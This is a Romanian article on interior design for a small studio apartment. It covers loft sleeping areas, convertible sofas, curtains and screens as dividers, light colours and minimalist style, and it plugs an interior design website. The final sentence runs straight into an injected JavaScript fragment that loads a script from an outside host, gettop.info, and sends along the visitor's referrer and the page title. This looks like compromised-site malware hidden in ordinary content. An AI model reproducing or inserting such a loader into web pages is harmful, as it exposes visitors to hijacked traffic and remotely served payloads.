amenajari interioare

amenajari interioare

Problema cu o garsonieră este aceea că este prea mică iar o singură cameră trebuie să îndeplinească mai multe funcții iar atunci vine cu adevărat greul: să te decizi ce stil de amenajări interioare să adopți pentru a fi funcțională și să nu se renunțe la nici o activitate pe care o întreprindem zilnic.

Amenajarea interioară a garsonierei desigur trebuie să includă un spațiu de relaxare, un spațiu de dormit, un living unde să primim musafirii, un loc de luat masa și toate acestea fără a renunța la nimic dintre acestea și fără a face ca garsoniera să arate ca un dormitor imediat ce am invitat pe cineva la noi.

Din acest articol puteți ,,fura” câteva idei pe care să le puneți în aplicare atunci când vreți să realizați amenajarea interioară a garsonierei.

Dacă vă aflați într-o situație similară atunci pot să vă spun că o idee de amenajare interioară a garsonierei este să mutați dormitorul la ,,etaj”, desigur, acest lucru fiind posibil doar dacă spațiul vă permite acest lucru. Și aici mă refer la utilizarea spațiului pe verticală. Este un compromis foarte avantajos pentru că la parter veți putea amenaja sufrageria și locul de luat masa fără să vă împiedicați de problema plasării dormitorului.

O altă idee pentru amenajarea interioară a garsonierei este aceea să utilizați mobilier multifuncțional cum ar fi o canapea extensibilă pe care ziua o puteți folosi pentru a decora living-ul iar seara să îl transformați într-un pat confortabil. Aceasta este o practică des întâlnită și utilizarea mobilierului multifuncțional pentru amenajarea interioară garsonierei vă va scuti de problema să nu aveți spațiu suficient pentru a vă depozita lucrurile care nu trebuie să se vadă.

Având în vedere că garsonierele sunt concepute în așa fel încât spațiile să nu fie separate de pereți care să asigure intimitatea, puteți apela la trucuri care să separe spațiile. De exemplu puteți utiliza draperii pentru a separa zona de dormit de living sau un paravan care să separeu living-ul de spațiul rezervat bucătăriei.

Anumite garsoniere au bucătăria separată sau au chiar un balcon. În amenajarea interioară a unei garsoniere este foarte important să folosiți fiecare bucată de spațiu în mod inteligent și să nu lăsați neutilizat nici măcar un centimetru.

Dacă garsoniera este mică, atunci culorile utilizate pentru amenajarea interioară trebuie să fie deschise pentru a oferi senzația de spațiu mai mare și nu îngreunează din punct de vedere vizual design-ul adoptat.

În general amenajarea interiorului în stil minimalist este cea mai recomandată pentru spațiile mici întrucât liniile drepte conferă ideea de spațiu.

Delimitarea inteligentă a spațiilor unei garsoniere nu vor oferi altceva decât tot confortul de care aveți nevoie indiferent de cantitatea de spațiu pe care o aveți disponibilă. Cu siguranță amenajarea interioară cu www.Logosidesigninterior.ro a unei garsoniere presupune multă creativitate dar, dacă știți cum să delimitați fiecare bucățică de spațiu vă veți simți ca într-un apartament mai mare.

Este foarte important ca să vă folosiți cât mai mult de mobilier funcțional pentru acest stil de amenajări interioare. Ca de exemplu biblioteca poate să fie scara către dormitorul de la ,,etaj” iar sub ,,etajul” dormitorului să aveți amenajat un dulap sau un mic spațiu de luat masa sau orice vă mai trece prin cap.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;